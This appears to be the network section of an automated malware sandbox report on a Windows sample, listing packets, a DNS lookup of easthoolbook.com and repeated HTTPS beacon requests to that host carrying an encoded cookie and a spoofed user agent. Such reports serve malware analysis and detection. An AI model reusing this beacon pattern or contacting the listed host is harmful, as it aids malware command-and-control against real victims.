                                                                          Apr 19, 2024 15:31:42.739643097 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.365936995 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.366028070 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:43.366780043 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:43.366795063 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.368504047 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:43.368514061 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.782335997 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.782411098 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:43.782422066 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.782466888 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:43.782468081 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.782525063 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:43.782999039 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:43.783020020 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:45.730226994 CEST49722443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:45.730321884 CEST4434972289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:45.730412960 CEST49722443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:45.730973959 CEST49722443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:45.731009007 CEST4434972289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:46.343486071 CEST4434972289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:46.343611002 CEST49722443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:46.344149113 CEST49722443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:46.344182014 CEST4434972289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:46.345813036 CEST49722443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:46.345834970 CEST4434972289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:46.767226934 CEST4434972289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:46.767347097 CEST4434972289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:46.767456055 CEST49722443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:46.774122953 CEST49722443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:46.774149895 CEST4434972289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:48.730602980 CEST49723443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:48.730648994 CEST4434972389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:48.730743885 CEST49723443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:48.731230974 CEST49723443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:48.731245995 CEST4434972389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:49.353976011 CEST4434972389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:32.694366932 CEST49739443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:32.694375038 CEST4434973989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:33.099340916 CEST4434973989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:33.099432945 CEST49739443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:33.099474907 CEST4434973989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:33.099515915 CEST49739443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:33.099526882 CEST4434973989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:33.099555016 CEST4434973989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:33.099571943 CEST49739443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:33.099594116 CEST49739443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:33.100045919 CEST49739443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:33.100058079 CEST4434973989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:35.050374031 CEST49740443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:35.050426960 CEST4434974089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:35.050502062 CEST49740443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:35.050776005 CEST49740443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:35.050791979 CEST4434974089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:35.677089930 CEST4434974089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:35.677289963 CEST49740443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:35.677782059 CEST49740443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:35.677797079 CEST4434974089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:35.679088116 CEST49740443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:35.679095030 CEST4434974089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:36.090249062 CEST4434974089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:36.090367079 CEST4434974089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:36.090509892 CEST49740443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:36.105626106 CEST49740443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:36.105659962 CEST4434974089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:39.878015995 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:39.878073931 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:39.878411055 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:39.878412008 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:39.878447056 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:40.503400087 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:40.503544092 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.504086018 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.504091978 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:40.505353928 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.505362988 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:40.920871019 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:40.921016932 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.921026945 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:40.921047926 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:40.921072960 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.921170950 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.921525955 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.921540976 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:42.866808891 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:42.866857052 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:42.866945982 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:42.867289066 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:42.867300987 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.492408037 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.492472887 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.492955923 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.492966890 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.494355917 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.494362116 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.907011986 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.907092094 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.907124996 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.907169104 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.907217979 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.907440901 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.907460928 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:45.880081892 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:45.880125999 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:45.880223036 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:45.880475044 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:45.880487919 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.507266045 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.507641077 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.524441004 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.524461031 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.526103020 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.526113033 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.917293072 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.917380095 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.917393923 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.917426109 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.917433023 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.917459965 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.917849064 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.917865992 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:48.850107908 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:48.850147009 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:48.850241899 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:48.850475073 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:48.850488901 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.476893902 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.476944923 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.477766991 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.477780104 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.485407114 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.485415936 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.892160892 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.892283916 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.892412901 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.892900944 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.892920971 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:51.834130049 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:51.834178925 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:51.834250927 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:51.834486961 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:51.834501982 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.460043907 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.460160971 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.460722923 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.460732937 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.462018013 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.462025881 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.876801014 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.876940012 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.877000093 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.877306938 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.877329111 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.128837109 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.128889084 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.128952026 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.130975008 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.130985975 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.742496967 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.742597103 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.743027925 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.743035078 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.744327068 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.744333029 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150635004 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150700092 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.150726080 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150767088 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.150772095 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150809050 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.150855064 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150897980 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.150994062 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.151007891 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.104425907 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.104480028 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.104553938 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.104928017 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.104942083 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.729063034 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.729191065 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.729722023 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.729748964 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.731070995 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.731084108 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:00.145243883 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:00.145368099 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:00.145428896 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:00.145428896 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:00.159507036 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:00.159559011 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:02.131889105 CEST49748443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:02.131933928 CEST4434974889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:02.132023096 CEST49748443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:02.132297993 CEST49748443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:02.132318974 CEST4434974889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:02.755567074 CEST4434974889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:02.755642891 CEST49748443192.168.2.689.150.57.46
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 15:30:59.005417109 CEST | 50014 | 53 | 192.168.2.6 | 1.1.1.1
Apr 19, 2024 15:30:59.143554926 CEST | 53 | 50014 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 19, 2024 15:30:59.005417109 CEST | 192.168.2.6 | 1.1.1.1 | 0x337b | Standard query (0) | easthoolbook.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 19, 2024 15:30:59.143554926 CEST | 1.1.1.1 | 192.168.2.6 | 0x337b | No error (0) | easthoolbook.com | | 89.150.57.46 | A (IP address) | IN (0x0001) | false
                                                                          • easthoolbook.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49699 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 13:30:59 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:31:00 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:18 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:31:00 UTC | 600 | IN | Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49700 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 13:31:02 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:31:03 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:21 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:31:03 UTC | 600 | IN | Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          2 | 192.168.2.6 | 49701 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:05 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:06 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:24 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:06 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          3 | 192.168.2.6 | 49702 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:08 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:09 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:27 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:09 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          4 | 192.168.2.6 | 49703 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:11 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:12 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:30 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:12 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          5 | 192.168.2.6 | 49704 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:15 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:15 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:34 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:15 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          6 | 192.168.2.6 | 49713 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:18 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
